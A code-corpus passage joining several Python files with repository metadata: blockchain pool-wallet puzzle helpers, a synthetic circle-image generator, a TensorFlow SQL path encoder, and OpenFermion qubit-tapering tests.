launcher_id: bytes32,
genesis_challenge: bytes32,
delay_time: uint64,
delay_ph: bytes32,
) -> Program:
pool_reward_prefix = bytes32(genesis_challenge[:16] + b"\x00" * 16)
p2_singleton_puzzle_hash: bytes32 = launcher_id_to_p2_puzzle_hash(launcher_id, delay_time, delay_ph)
return POOL_MEMBER_MOD.curry(
target_puzzle_hash,
p2_singleton_puzzle_hash,
bytes(owner_pubkey),
pool_reward_prefix,
pool_waiting_room_inner_hash,
)
def create_full_puzzle(inner_puzzle: Program, launcher_id: bytes32) -> Program:
return puzzle_for_singleton(launcher_id, inner_puzzle)
def create_p2_singleton_puzzle(
singleton_mod_hash: bytes,
launcher_id: bytes32,
seconds_delay: uint64,
delayed_puzzle_hash: bytes32,
) -> Program:
# curry params are SINGLETON_MOD_HASH LAUNCHER_ID LAUNCHER_PUZZLE_HASH SECONDS_DELAY DELAYED_PUZZLE_HASH
return P2_SINGLETON_MOD.curry(
singleton_mod_hash, launcher_id, SINGLETON_LAUNCHER_HASH, seconds_delay, delayed_puzzle_hash
)
def launcher_id_to_p2_puzzle_hash(launcher_id: bytes32, seconds_delay: uint64, delayed_puzzle_hash: bytes32) -> bytes32:
return create_p2_singleton_puzzle(
SINGLETON_MOD_HASH, launcher_id, int_to_bytes(seconds_delay), delayed_puzzle_hash
).get_tree_hash()
def get_delayed_puz_info_from_launcher_spend(coinsol: CoinSpend) -> Tuple[uint64, bytes32]:
extra_data = Program.from_bytes(bytes(coinsol.solution)).rest().rest().first()
# Extra data is (pool_state delayed_puz_info)
# Delayed puz info is (seconds delayed_puzzle_hash)
seconds: Optional[uint64] = None
delayed_puzzle_hash: Optional[bytes32] = None
for key, value in extra_data.as_python():
if key == b"t":
seconds = int_from_bytes(value)
if key == b"h":
delayed_puzzle_hash = bytes32(value)
assert seconds is not None
assert delayed_puzzle_hash is not None
return seconds, delayed_puzzle_hash
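# Illustrative layout (assumed values): the launcher solution's extra data is a
# list of key/value pairs such as
#     [(b"p", <PoolState bytes>), (b"t", int_to_bytes(604800)), (b"h", <32-byte hash>)]
# The loop above reads b"t" (the delay in seconds) and b"h" (the delayed puzzle
# hash); b"p" is consumed separately by pool_state_from_extra_data below.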
######################################
def get_template_singleton_inner_puzzle(inner_puzzle: Program):
r = inner_puzzle.uncurry()
if r is None:
return False
uncurried_inner_puzzle, args = r
return uncurried_inner_puzzle
def get_seconds_and_delayed_puzhash_from_p2_singleton_puzzle(puzzle: Program) -> Tuple[uint64, bytes32]:
r = puzzle.uncurry()
if r is None:
return False
inner_f, args = r
singleton_mod_hash, launcher_id, launcher_puzzle_hash, seconds_delay, delayed_puzzle_hash = list(args.as_iter())
seconds_delay = uint64(seconds_delay.as_int())
return seconds_delay, delayed_puzzle_hash.as_atom()
# Verify that a puzzle is a Pool Wallet Singleton
def is_pool_singleton_inner_puzzle(inner_puzzle: Program) -> bool:
inner_f = get_template_singleton_inner_puzzle(inner_puzzle)
return inner_f in [POOL_WAITING_ROOM_MOD, POOL_MEMBER_MOD]
def is_pool_waitingroom_inner_puzzle(inner_puzzle: Program) -> bool:
inner_f = get_template_singleton_inner_puzzle(inner_puzzle)
return inner_f in [POOL_WAITING_ROOM_MOD]
def is_pool_member_inner_puzzle(inner_puzzle: Program) -> bool:
inner_f = get_template_singleton_inner_puzzle(inner_puzzle)
return inner_f in [POOL_MEMBER_MOD]
# This spend will use the escape-type spend path for whichever state you are currently in
# If you are currently a waiting inner puzzle, then it will look at your target_state to determine the next
# inner puzzle hash to go to. The member inner puzzle is already committed to its next puzzle hash.
def create_travel_spend(
last_coin_spend: CoinSpend,
launcher_coin: Coin,
current: PoolState,
target: PoolState,
genesis_challenge: bytes32,
delay_time: uint64,
delay_ph: bytes32,
) -> Tuple[CoinSpend, Program]:
inner_puzzle: Program = pool_state_to_inner_puzzle(
current,
launcher_coin.name(),
genesis_challenge,
delay_time,
delay_ph,
)
if is_pool_member_inner_puzzle(inner_puzzle):
# inner sol is key_value_list ()
# key_value_list is:
# "ps" -> poolstate as bytes
inner_sol: Program = Program.to([[("p", bytes(target))], 0])
elif is_pool_waitingroom_inner_puzzle(inner_puzzle):
# inner sol is (spend_type, key_value_list, pool_reward_height)
destination_inner: Program = pool_state_to_inner_puzzle(
target, launcher_coin.name(), genesis_challenge, delay_time, delay_ph
)
log.debug(
f"create_travel_spend: waitingroom: target PoolState bytes:\n{bytes(target).hex()}\n"
f"{target}"
f"hash:{Program.to(bytes(target)).get_tree_hash()}"
)
# key_value_list is:
# "ps" -> poolstate as bytes
inner_sol = Program.to([1, [("p", bytes(target))], destination_inner.get_tree_hash()]) # current or target
else:
raise ValueError
current_singleton: Optional[Coin] = get_most_recent_singleton_coin_from_coin_spend(last_coin_spend)
assert current_singleton is not None
if current_singleton.parent_coin_info == launcher_coin.name():
parent_info_list = Program.to([launcher_coin.parent_coin_info, launcher_coin.amount])
else:
p = Program.from_bytes(bytes(last_coin_spend.puzzle_reveal))
last_coin_spend_inner_puzzle: Optional[Program] = get_inner_puzzle_from_puzzle(p)
assert last_coin_spend_inner_puzzle is not None
parent_info_list = Program.to(
[
last_coin_spend.coin.parent_coin_info,
last_coin_spend_inner_puzzle.get_tree_hash(),
last_coin_spend.coin.amount,
]
)
full_solution: Program = Program.to([parent_info_list, current_singleton.amount, inner_sol])
full_puzzle: Program = create_full_puzzle(inner_puzzle, launcher_coin.name())
return (
CoinSpend(
current_singleton,
SerializedProgram.from_program(full_puzzle),
SerializedProgram.from_program(full_solution),
),
inner_puzzle,
)
def create_absorb_spend(
last_coin_spend: CoinSpend,
current_state: PoolState,
launcher_coin: Coin,
height: uint32,
genesis_challenge: bytes32,
delay_time: uint64,
delay_ph: bytes32,
) -> List[CoinSpend]:
inner_puzzle: Program = pool_state_to_inner_puzzle(
current_state, launcher_coin.name(), genesis_challenge, delay_time, delay_ph
)
reward_amount: uint64 = calculate_pool_reward(height)
if is_pool_member_inner_puzzle(inner_puzzle):
# inner sol is (spend_type, pool_reward_amount, pool_reward_height, extra_data)
inner_sol: Program = Program.to([reward_amount, height])
elif is_pool_waitingroom_inner_puzzle(inner_puzzle):
# inner sol is (spend_type, destination_puzhash, pool_reward_amount, pool_reward_height, extra_data)
inner_sol = Program.to([0, reward_amount, height])
else:
raise ValueError
# full sol = (parent_info, my_amount, inner_solution)
coin: Optional[Coin] = get_most_recent_singleton_coin_from_coin_spend(last_coin_spend)
assert coin is not None
if coin.parent_coin_info == launcher_coin.name():
parent_info: Program = Program.to([launcher_coin.parent_coin_info, launcher_coin.amount])
else:
p = Program.from_bytes(bytes(last_coin_spend.puzzle_reveal))
last_coin_spend_inner_puzzle: Optional[Program] = get_inner_puzzle_from_puzzle(p)
assert last_coin_spend_inner_puzzle is not None
parent_info = Program.to(
[
last_coin_spend.coin.parent_coin_info,
last_coin_spend_inner_puzzle.get_tree_hash(),
last_coin_spend.coin.amount,
]
)
full_solution: SerializedProgram = SerializedProgram.from_program(
Program.to([parent_info, last_coin_spend.coin.amount, inner_sol])
)
full_puzzle: SerializedProgram = SerializedProgram.from_program(
create_full_puzzle(inner_puzzle, launcher_coin.name())
)
assert coin.puzzle_hash == full_puzzle.get_tree_hash()
reward_parent: bytes32 = pool_parent_id(height, genesis_challenge)
p2_singleton_puzzle: SerializedProgram = SerializedProgram.from_program(
create_p2_singleton_puzzle(SINGLETON_MOD_HASH, launcher_coin.name(), delay_time, delay_ph)
)
reward_coin: Coin = Coin(reward_parent, p2_singleton_puzzle.get_tree_hash(), reward_amount)
p2_singleton_solution: SerializedProgram = SerializedProgram.from_program(
Program.to([inner_puzzle.get_tree_hash(), reward_coin.name()])
)
assert p2_singleton_puzzle.get_tree_hash() == reward_coin.puzzle_hash
assert full_puzzle.get_tree_hash() == coin.puzzle_hash
assert get_inner_puzzle_from_puzzle(Program.from_bytes(bytes(full_puzzle))) is not None
coin_spends = [
CoinSpend(coin, full_puzzle, full_solution),
CoinSpend(reward_coin, p2_singleton_puzzle, p2_singleton_solution),
]
return coin_spends
def get_most_recent_singleton_coin_from_coin_spend(coin_sol: CoinSpend) -> Optional[Coin]:
additions: List[Coin] = coin_sol.additions()
for coin in additions:
if coin.amount % 2 == 1:
return coin
return None
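# Note: singleton coins carry an odd amount by construction, so the odd-amount
# addition above is the new singleton child created by this spend.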
def get_pubkey_from_member_inner_puzzle(inner_puzzle: Program) -> G1Element:
args = uncurry_pool_member_inner_puzzle(inner_puzzle)
if args is not None:
(
_inner_f,
_target_puzzle_hash,
_p2_singleton_hash,
pubkey_program,
_pool_reward_prefix,
_escape_puzzlehash,
) = args
else:
raise ValueError("Unable to extract pubkey")
pubkey = G1Element.from_bytes(pubkey_program.as_atom())
return pubkey
def uncurry_pool_member_inner_puzzle(inner_puzzle: Program): # -> Optional[Tuple[Program, Program, Program]]:
"""
    Take a puzzle and raise `ValueError` if it's not a "pool member" inner puzzle;
    otherwise return `inner_f, target_puzzle_hash, p2_singleton_hash, owner_pubkey,
    pool_reward_prefix, escape_puzzlehash`.
"""
if not is_pool_member_inner_puzzle(inner_puzzle):
raise ValueError("Attempting to unpack a non-waitingroom inner puzzle")
r = inner_puzzle.uncurry()
if r is None:
raise ValueError("Failed to unpack inner puzzle")
inner_f, args = r
# p2_singleton_hash is the tree hash of the unique, curried P2_SINGLETON_MOD. See `create_p2_singleton_puzzle`
# escape_puzzlehash is of the unique, curried POOL_WAITING_ROOM_MOD. See `create_waiting_room_inner_puzzle`
target_puzzle_hash, p2_singleton_hash, owner_pubkey, pool_reward_prefix, escape_puzzlehash = tuple(args.as_iter())
return inner_f, target_puzzle_hash, p2_singleton_hash, owner_pubkey, pool_reward_prefix, escape_puzzlehash
def uncurry_pool_waitingroom_inner_puzzle(inner_puzzle: Program) -> Tuple[Program, Program, Program, Program]:
"""
    Take a puzzle and raise `ValueError` if it's not a "pool waitingroom" inner
    puzzle; otherwise return `target_puzzle_hash, relative_lock_height,
    owner_pubkey, p2_singleton_hash`.
"""
if not is_pool_waitingroom_inner_puzzle(inner_puzzle):
raise ValueError("Attempting to unpack a non-waitingroom inner puzzle")
r = inner_puzzle.uncurry()
if r is None:
raise ValueError("Failed to unpack inner puzzle")
inner_f, args = r
v = args.as_iter()
target_puzzle_hash, p2_singleton_hash, owner_pubkey, genesis_challenge, relative_lock_height = tuple(v)
return target_puzzle_hash, relative_lock_height, owner_pubkey, p2_singleton_hash
def get_inner_puzzle_from_puzzle(full_puzzle: Program) -> Optional[Program]:
p = Program.from_bytes(bytes(full_puzzle))
r = p.uncurry()
if r is None:
return None
_, args = r
_, inner_puzzle = list(args.as_iter())
if not is_pool_singleton_inner_puzzle(inner_puzzle):
return None
return inner_puzzle
def pool_state_from_extra_data(extra_data: Program) -> Optional[PoolState]:
state_bytes: Optional[bytes] = None
try:
for key, value in extra_data.as_python():
if key == b"p":
state_bytes = value
break
if state_bytes is None:
return None
return PoolState.from_bytes(state_bytes)
except TypeError as e:
log.error(f"Unexpected return from PoolWallet Smart Contract code {e}")
return None
def solution_to_pool_state(full_spend: CoinSpend) -> Optional[PoolState]:
full_solution_ser: SerializedProgram = full_spend.solution
full_solution: Program = Program.from_bytes(bytes(full_solution_ser))
if full_spend.coin.puzzle_hash == SINGLETON_LAUNCHER_HASH:
# Launcher spend
extra_data: Program = full_solution.rest().rest().first()
return pool_state_from_extra_data(extra_data)
# Not launcher spend
inner_solution: Program = full_solution.rest().rest().first()
# Spend which is not absorb, and is not the launcher
num_args = len(inner_solution.as_python())
assert num_args in (2, 3)
if num_args == 2:
# pool member
if inner_solution.rest().first().as_int() != 0:
return None
# This is referred to as p1 in the chiveslisp code
# spend_type is absorbing money if p1 is a cons box, spend_type is escape if p1 is an atom
# TODO: The comment above, and in the CLVM, seems wrong
extra_data = inner_solution.first()
if isinstance(extra_data.as_python(), bytes):
# Absorbing
return None
return pool_state_from_extra_data(extra_data)
else:
# pool waitingroom
if inner_solution.first().as_int() == 0:
return None
extra_data = inner_solution.rest().first()
return pool_state_from_extra_data(extra_data)
def pool_state_to_inner_puzzle(
pool_state: PoolState, launcher_id: bytes32, genesis_challenge: bytes32, delay_time: uint64, delay_ph: bytes32
) -> Program:
escaping_inner_puzzle: Program = create_waiting_room_inner_puzzle(
pool_state.target_puzzle_hash,
pool_state.relative_lock_height,
pool_state.owner_pubkey,
launcher_id,
genesis_challenge,
delay_time,
delay_ph,
)
if pool_state.state in [LEAVING_POOL, SELF_POOLING]:
return escaping_inner_puzzle
else:
return create_pooling_inner_puzzle(
pool_state.target_puzzle_hash,
escaping_inner_puzzle.get_tree_hash(),
pool_state.owner_pubkey,
launcher_id,
genesis_challenge,
delay_time,
delay_ph,
)
| 39.303944
| 120
| 0.725148
|
9918a6ac176937d502ff62b5bfe1073215f0db3c
| 4,125
|
py
|
Python
|
data_gen/DataGenerator.py
|
Jos3f/Intensity-based-clustering-study
|
fac2cc1ab23e7ebbbf87563deb6c242cbdac374c
|
[
"Unlicense"
] | 2
|
2021-04-13T14:55:45.000Z
|
2021-04-29T01:53:39.000Z
|
data_gen/DataGenerator.py
|
Jos3f/Intensity-based-clustering-study
|
fac2cc1ab23e7ebbbf87563deb6c242cbdac374c
|
[
"Unlicense"
] | null | null | null |
data_gen/DataGenerator.py
|
Jos3f/Intensity-based-clustering-study
|
fac2cc1ab23e7ebbbf87563deb6c242cbdac374c
|
[
"Unlicense"
] | null | null | null |
import os
import numpy as np
from PIL import Image
import matplotlib.pyplot as plt
from scipy.ndimage import gaussian_filter
from skimage.draw import circle  # NOTE: deprecated in newer scikit-image; skimage.draw.disk is the replacement
import math
class DataGenerator:
def __init__(self, dims, seed=1337):
self.dims = dims
np.random.seed(seed)
        # NOTE: the first two target templates below are immediately
        # overridden; only the final 24x24 block of ones is actually used.
        self.target = np.array([[0, 1, 1, 1, 1, 0],
                                [1, 1, 1, 1, 1, 1],
                                [1, 1, 1, 1, 1, 1],
                                [1, 1, 1, 1, 1, 1],
                                [1, 1, 1, 1, 1, 1],
                                [0, 1, 1, 1, 1, 0]])
        self.target = np.array([[1, 1, 1],
                                [1, 1, 1],
                                [1, 1, 1]])
        self.target = np.ones((24, 24)).astype(int)
def sample_images(self, n=100, targets=300, bound = 0.6, ratio = 0.5, image_dir=None, label_dir=None):
"""
        ratio: fraction of the added circles that get high intensity and are
            included in the label; the remaining circles get low intensity
            and are left out of the label
        bound: the intensity boundary separating high- and low-intensity circles
"""
if image_dir is not None:
if not os.path.exists(image_dir):
os.makedirs(image_dir)
if label_dir is not None:
if not os.path.exists(label_dir):
os.makedirs(label_dir)
images = []
labels = []
for i in range(n):
image, label = self.sample_image(bound,ratio,targets)
# images.append(image)
# labels.append(label)
if image_dir is not None:
im = Image.fromarray(image)
im.save(image_dir + '/' + str(i) + ".tif")
if label_dir is not None:
im = Image.fromarray(label)
im.save(label_dir + '/' + str(i) + ".tif")
return images, labels
def sample_image(self, bound, ratio, targets=300):
generated_label = np.zeros(self.dims).astype(int)
generated_image = np.zeros(self.dims).astype(float)
positions = self._get_random_coordinates(targets, margin=(self.target.shape[0]))
radius=10
for i in range(int(math.floor(targets * ratio))):
x = positions[i][0]
y = positions[i][1]
rr,cc = circle(x,y,radius,generated_label.shape)
generated_label[rr,cc] = 255
generated_image[rr, cc] = np.random.uniform(bound, 1)
for i in range(int(math.floor(targets * ratio)),targets):
x = positions[i][0]
y = positions[i][1]
rr,cc = circle(x,y,radius,generated_label.shape)
generated_image[rr, cc] = np.random.uniform(0.15, bound)
generated_label = generated_label.clip(max=255)
# generated_image = gaussian_filter(generated_image, sigma=2)
generated_image = gaussian_filter(generated_image, sigma=10)
generated_image = generated_image + np.random.normal(0.005, 0.01, generated_image.shape)
generated_image = generated_image.clip(min=0, max=1)
# generated_image = gaussian_filter(generated_label, sigma=2)
generated_image = (generated_image / np.max(generated_image) * 255).astype(int)
# plt.rcParams["figure.figsize"] = (20, 20)
# plt.tight_layout()
# plt.matshow(generated_label)
# plt.show()
#
# plt.matshow(generated_image)
# plt.show()
return np.uint8(generated_image), np.uint8(generated_label)
def _get_random_coordinates(self, num=300, margin=6):
coordinates_x = np.random.choice(self.dims[0] - margin, num)
coordinates_y = np.random.choice(self.dims[1] - margin, num)
coordinates = np.vstack((coordinates_x, coordinates_y)).T
return coordinates
if __name__ == '__main__':
dg = DataGenerator((1024, 1024))
dg.sample_image(bound = 0.6, ratio = 0.5,targets=900)
dg.sample_images(100, targets=300, bound = 0.6, ratio = 0.5, image_dir="images", label_dir="labels")
| 35.869565
| 107
| 0.550303
|
cfd1f3b371a507a60319d50a73825887c67690d0
| 2,339
|
py
|
Python
|
src/path_encoder.py
|
Thuamo/RYANSQL
|
d6c03c07db52cbca76b5b935843a39da90636280
|
[
"Apache-2.0"
] | 21
|
2020-07-10T01:13:29.000Z
|
2021-11-22T08:24:12.000Z
|
src/path_encoder.py
|
Thuamo/RYANSQL
|
d6c03c07db52cbca76b5b935843a39da90636280
|
[
"Apache-2.0"
] | 2
|
2021-10-14T04:54:57.000Z
|
2021-10-14T05:01:10.000Z
|
src/path_encoder.py
|
Thuamo/RYANSQL
|
d6c03c07db52cbca76b5b935843a39da90636280
|
[
"Apache-2.0"
] | 8
|
2020-11-09T04:01:26.000Z
|
2021-12-26T13:29:47.000Z
|
import tensorflow as tf
import sys
sys.path.append( "../../util" )
from networkcomponents import *
from db_meta import *
class PathEncoder:
def __init__( self ):
vec_pathcode = [ PATH_NONE, PATH_UNION, PATH_INTER, PATH_EXCEPT, PATH_WHERE, PATH_HAVING, PATH_PAR ]
self.path_dic = dict()
self.path_dic_rev = dict()
for pidx, p in enumerate( vec_pathcode ):
self.path_dic[ p ] = pidx
self.path_dic_rev[ pidx ] = p
def _initialize_embeddings( self, path_embed_len, regularizer = None ):
print ( "PATH INITEMBED CALLED" )
path_embed = tf.get_variable( name = "path_embed", initializer = variable_initializer, shape = [ len( self.path_dic ), path_embed_len ], trainable = True, regularizer = regularizer, dtype = tf.float32 )
path_pad = tf.constant( 0.0, shape = [ 1, path_embed_len ], dtype = tf.float32 )
self.path_embed = tf.concat( [ path_embed, path_pad ], 0 )
# path_idx: BS X P.
# Returns: BS X D. path encoding.
def get_path_embeddings( self, path_embed_len, \
path_idx, path_mask, \
final_out_dim, scope, \
training, keep_prob = 1.0, regularizer = None ):
with tf.variable_scope( scope ):
self._initialize_embeddings( path_embed_len, regularizer )
batch_size = tf.shape( path_idx )[0]
max_p_len = tf.shape( path_idx )[1]
# 1. Convert to path embed matrix.
p_embed = tf.nn.embedding_lookup( self.path_embed, path_idx )
p_embed = tf.nn.dropout( p_embed, keep_prob )
p_embed = apply_mask( p_embed, path_mask, float( 0.0 ) )
conv1d_filter = tf.get_variable( name = "c1d_filter", initializer = variable_initializer, shape = [ 3, p_embed.get_shape().as_list()[-1], p_embed.get_shape().as_list()[-1]], regularizer = regularizer, dtype = tf.float32 )
p_embed = tf.nn.conv1d( p_embed, conv1d_filter, 1, "SAME" )
p_embed = tf.nn.dropout( p_embed, keep_prob )
p_embed = tf.nn.leaky_relu( p_embed )
p_embed = apply_mask( p_embed, path_mask, float( "-inf" ) )
p_embed = tf.reduce_max( p_embed, 1 )
return p_embed
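# Hypothetical usage sketch (TF1-style; the placeholder names, dtypes and sizes
# are assumptions for illustration, not part of this module):
#     encoder = PathEncoder()
#     path_idx = tf.placeholder(tf.int32, [None, None])     # BS X P
#     path_mask = tf.placeholder(tf.float32, [None, None])  # BS X P
#     p_vec = encoder.get_path_embeddings(64, path_idx, path_mask, 64,
#                                         "path_encoder", training=True)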
| 45.862745
| 235
| 0.599401
|
c6d854dd963e8c0d515d89e4f1051d45fd01a5ad
| 15,555
|
py
|
Python
|
src/openfermion/transforms/repconversions/qubit_tapering_from_stabilizer_test.py
|
Emieeel/OpenFermion
|
c19d9667c5970473893f9bc0183556c4cd354dd7
|
[
"Apache-2.0"
] | 1,291
|
2017-09-27T22:00:26.000Z
|
2022-03-25T14:34:50.000Z
|
src/openfermion/transforms/repconversions/qubit_tapering_from_stabilizer_test.py
|
xabomon/OpenFermion
|
8028082805a8e48d9fd179e7616e7df8a256693c
|
[
"Apache-2.0"
] | 521
|
2017-09-27T21:36:17.000Z
|
2022-03-02T12:45:56.000Z
|
src/openfermion/transforms/repconversions/qubit_tapering_from_stabilizer_test.py
|
xabomon/OpenFermion
|
8028082805a8e48d9fd179e7616e7df8a256693c
|
[
"Apache-2.0"
] | 365
|
2017-09-27T21:25:38.000Z
|
2022-03-29T19:28:46.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test for qubit_tapering_from_stabilizer model."""
import unittest
import numpy
from openfermion.chem import MolecularData
from openfermion.ops.operators import QubitOperator
from openfermion.transforms.opconversions import (jordan_wigner,
get_fermion_operator)
from openfermion.linalg import eigenspectrum
from openfermion.utils.operator_utils import count_qubits
from openfermion.transforms.repconversions.qubit_tapering_from_stabilizer \
import (StabilizerError, check_commuting_stabilizers,
check_stabilizer_linearity, fix_single_term, _reduce_terms,
_reduce_terms_keep_length, _lookup_term, reduce_number_of_terms,
taper_off_qubits)
def lih_hamiltonian():
"""
Generate test Hamiltonian from LiH.
Args:
None
Return:
hamiltonian: FermionicOperator
spectrum: List of energies.
"""
geometry = [('Li', (0., 0., 0.)), ('H', (0., 0., 1.45))]
active_space_start = 1
active_space_stop = 3
molecule = MolecularData(geometry, 'sto-3g', 1, description="1.45")
molecule.load()
molecular_hamiltonian = molecule.get_molecular_hamiltonian(
occupied_indices=range(active_space_start),
active_indices=range(active_space_start, active_space_stop))
hamiltonian = get_fermion_operator(molecular_hamiltonian)
spectrum = eigenspectrum(hamiltonian)
return hamiltonian, spectrum
class TaperingTest(unittest.TestCase):
"""TaperingTest class."""
def test_function_errors(self):
"""Test error of main function."""
hamiltonian, _ = lih_hamiltonian()
qubit_hamiltonian = jordan_wigner(hamiltonian)
stab1 = QubitOperator('Z0 Z2', -1.0)
stab2 = QubitOperator('Z1 Z3', -1.0)
with self.assertRaises(TypeError):
reduce_number_of_terms(operator=1, stabilizers=stab1 + stab2)
with self.assertRaises(TypeError):
reduce_number_of_terms(operator=qubit_hamiltonian, stabilizers=1)
with self.assertRaises(TypeError):
reduce_number_of_terms(operator=qubit_hamiltonian,
stabilizers=stab1 + stab2,
manual_input=True,
fixed_positions=None)
with self.assertRaises(StabilizerError):
reduce_number_of_terms(operator=qubit_hamiltonian,
stabilizers=stab1 + stab2,
manual_input=True,
fixed_positions=[1])
with self.assertRaises(StabilizerError):
reduce_number_of_terms(operator=qubit_hamiltonian,
stabilizers=stab1 + stab2,
manual_input=True,
fixed_positions=[1, 1])
with self.assertRaises(StabilizerError):
# Check Identity as stabilizer error.
reduce_number_of_terms(operator=qubit_hamiltonian,
stabilizers=(stab1 +
QubitOperator(' ', 1.0)))
with self.assertRaises(StabilizerError):
# Check complex coefficient stabilizer error.
reduce_number_of_terms(operator=qubit_hamiltonian,
stabilizers=(stab1 +
QubitOperator('Z0', 1.0j)))
with self.assertRaises(StabilizerError):
# Check linearly-dependent stabilizer error.
reduce_number_of_terms(
operator=qubit_hamiltonian,
stabilizers=(stab1 + QubitOperator('Z0 Z1 Z2 Z3', 1.0) + stab2))
with self.assertRaises(StabilizerError):
# Check anti-commuting stabilizer error.
reduce_number_of_terms(operator=qubit_hamiltonian,
stabilizers=(QubitOperator('X0', 1.0) +
QubitOperator('Y0', 1.0)))
with self.assertRaises(StabilizerError):
# Check linearly-dependent stabilizer error.
_reduce_terms(
terms=qubit_hamiltonian,
stabilizer_list=list(stab1 + QubitOperator('Z0 Z1 Z2 Z3', 1.0) +
stab2),
manual_input=False,
fixed_positions=[])
with self.assertRaises(StabilizerError):
# Check complex coefficient stabilizer error.
_reduce_terms(terms=qubit_hamiltonian,
stabilizer_list=list(stab1 +
QubitOperator('Z0', 1.0j)),
manual_input=False,
fixed_positions=[])
with self.assertRaises(StabilizerError):
# Check linearly-dependent stabilizer error.
par_qop = QubitOperator('Z0 Z1 Z2 Z3', 1.0)
_reduce_terms_keep_length(terms=qubit_hamiltonian,
stabilizer_list=[stab1, par_qop, stab2],
manual_input=False,
fixed_positions=[])
with self.assertRaises(StabilizerError):
# Check complex coefficient stabilizer error.
aux_qop = QubitOperator('Z0', 1.0j)
_reduce_terms_keep_length(terms=qubit_hamiltonian,
stabilizer_list=[stab1, aux_qop],
manual_input=False,
fixed_positions=[])
with self.assertRaises(StabilizerError):
            # Test the check_commuting_stabilizers function.
# Requires a list of QubitOperators one of which
# has an imaginary term.
check_commuting_stabilizers(stabilizer_list=[
QubitOperator('Z0 Z1', 1.0),
QubitOperator('X0', 1j)
],
msg='This test fails.')
with self.assertRaises(StabilizerError):
# Test check_stabilizer_linearity function.
            # Requires a list of QubitOperators one of which is
# the identity.
check_stabilizer_linearity(
[QubitOperator('Z0 Z1', 1.0),
QubitOperator(' ', 1.0)],
msg='This test fails.')
def test_fix_single_term(self):
"""Test fix_single_term function."""
stab2 = QubitOperator('Z1 Z3', -1.0)
test_term = QubitOperator('Z1 Z2')
fix1 = fix_single_term(test_term, 1, 'Z', 'X', stab2)
fix2 = fix_single_term(test_term, 0, 'X', 'X', stab2)
self.assertTrue(fix1 == (test_term * stab2))
self.assertTrue(fix2 == test_term)
def test_lookup_term(self):
"""Test for the auxiliar function _lookup_term."""
# Dummy test where the initial Pauli string is larger than the
# updated one.
start_op = list(QubitOperator('Z0 Z1 Z2 Z3').terms.keys())[0]
updateop1 = QubitOperator('Z0 Z2', -1.0)
updateop2 = list(QubitOperator('Z0 Z1 Z2 Z3').terms.keys())
qop = _lookup_term(start_op, [updateop1], updateop2)
final_op = list(qop.terms.keys())[0]
self.assertLess(len(final_op), len(start_op))
def test_reduce_terms(self):
"""Test reduce_terms function using LiH Hamiltonian."""
hamiltonian, spectrum = lih_hamiltonian()
qubit_hamiltonian = jordan_wigner(hamiltonian)
stab1 = QubitOperator('Z0 Z2', -1.0)
stab2 = QubitOperator('Z1 Z3', -1.0)
red_eigenspectrum = eigenspectrum(
reduce_number_of_terms(qubit_hamiltonian, stab1 + stab2))
self.assertAlmostEqual(spectrum[0], red_eigenspectrum[0])
def test_reduce_terms_manual_input(self):
"""Test reduce_terms function using LiH Hamiltonian."""
hamiltonian, spectrum = lih_hamiltonian()
qubit_hamiltonian = jordan_wigner(hamiltonian)
stab1 = QubitOperator('Z0 Z2', -1.0)
stab2 = QubitOperator('Z1 Z3', -1.0)
red_eigenspectrum = eigenspectrum(
reduce_number_of_terms(qubit_hamiltonian, [stab1, stab2],
manual_input=True,
fixed_positions=[0, 1]))
self.assertAlmostEqual(spectrum[0], red_eigenspectrum[0])
def test_reduce_terms_maintain_length(self):
"""Test reduce_terms function using LiH Hamiltonian."""
hamiltonian, spectrum = lih_hamiltonian()
qubit_hamiltonian = jordan_wigner(hamiltonian)
stab1 = QubitOperator('Z0 Z2', -1.0)
stab2 = QubitOperator('Z1 Z3', -1.0)
red_eigenspectrum = eigenspectrum(
reduce_number_of_terms(qubit_hamiltonian,
stab1 + stab2,
maintain_length=True))
self.assertAlmostEqual(spectrum[0], red_eigenspectrum[0])
def test_reduce_terms_auxiliar_functions(self):
"""Test reduce_terms function using LiH Hamiltonian."""
hamiltonian, spectrum = lih_hamiltonian()
qubit_ham = jordan_wigner(hamiltonian)
stab1 = QubitOperator('Z0 Z2', -1.0)
stab2 = QubitOperator('Z1 Z3', -1.0)
red_ham1, _ = _reduce_terms(terms=qubit_ham,
stabilizer_list=[stab1, stab2],
manual_input=False,
fixed_positions=[])
red_ham2, _ = _reduce_terms_keep_length(terms=qubit_ham,
stabilizer_list=[stab1, stab2],
manual_input=False,
fixed_positions=[])
red_eigspct1 = eigenspectrum(red_ham1)
red_eigspct2 = eigenspectrum(red_ham2)
self.assertAlmostEqual(spectrum[0], red_eigspct1[0])
self.assertAlmostEqual(spectrum[0], red_eigspct2[0])
def test_reduce_terms_auxiliar_functions_manual_input(self):
"""Test reduce_terms function using LiH Hamiltonian."""
hamiltonian, spectrum = lih_hamiltonian()
qubit_ham = jordan_wigner(hamiltonian)
stab1 = QubitOperator('Z0 Z2', -1.0)
stab2 = QubitOperator('Z1 Z3', -1.0)
red_ham1, _ = _reduce_terms(terms=qubit_ham,
stabilizer_list=[stab1, stab2],
manual_input=True,
fixed_positions=[0, 1])
red_ham2, _ = _reduce_terms_keep_length(terms=qubit_ham,
stabilizer_list=[stab1, stab2],
manual_input=True,
fixed_positions=[0, 1])
red_eigspct1 = eigenspectrum(red_ham1)
red_eigspct2 = eigenspectrum(red_ham2)
self.assertAlmostEqual(spectrum[0], red_eigspct1[0])
self.assertAlmostEqual(spectrum[0], red_eigspct2[0])
def test_tapering_qubits_manual_input_false(self):
"""Test taper_off_qubits function using LiH Hamiltonian."""
hamiltonian, spectrum = lih_hamiltonian()
qubit_hamiltonian = jordan_wigner(hamiltonian)
stab1 = QubitOperator('Z0 Z2', -1.0)
stab2 = QubitOperator('Z1 Z3', -1.0)
tapered_hamiltonian = taper_off_qubits(operator=qubit_hamiltonian,
stabilizers=[stab1, stab2],
manual_input=False,
fixed_positions=[0, 3])
tapered_spectrum = eigenspectrum(tapered_hamiltonian)
self.assertAlmostEqual(spectrum[0], tapered_spectrum[0])
def test_tapering_qubits_manual_input(self):
"""
Test taper_off_qubits function using LiH Hamiltonian.
Checks different qubits inputs to remove manually.
Test the lowest eigenvalue against the full Hamiltonian,
and the full spectrum between them.
"""
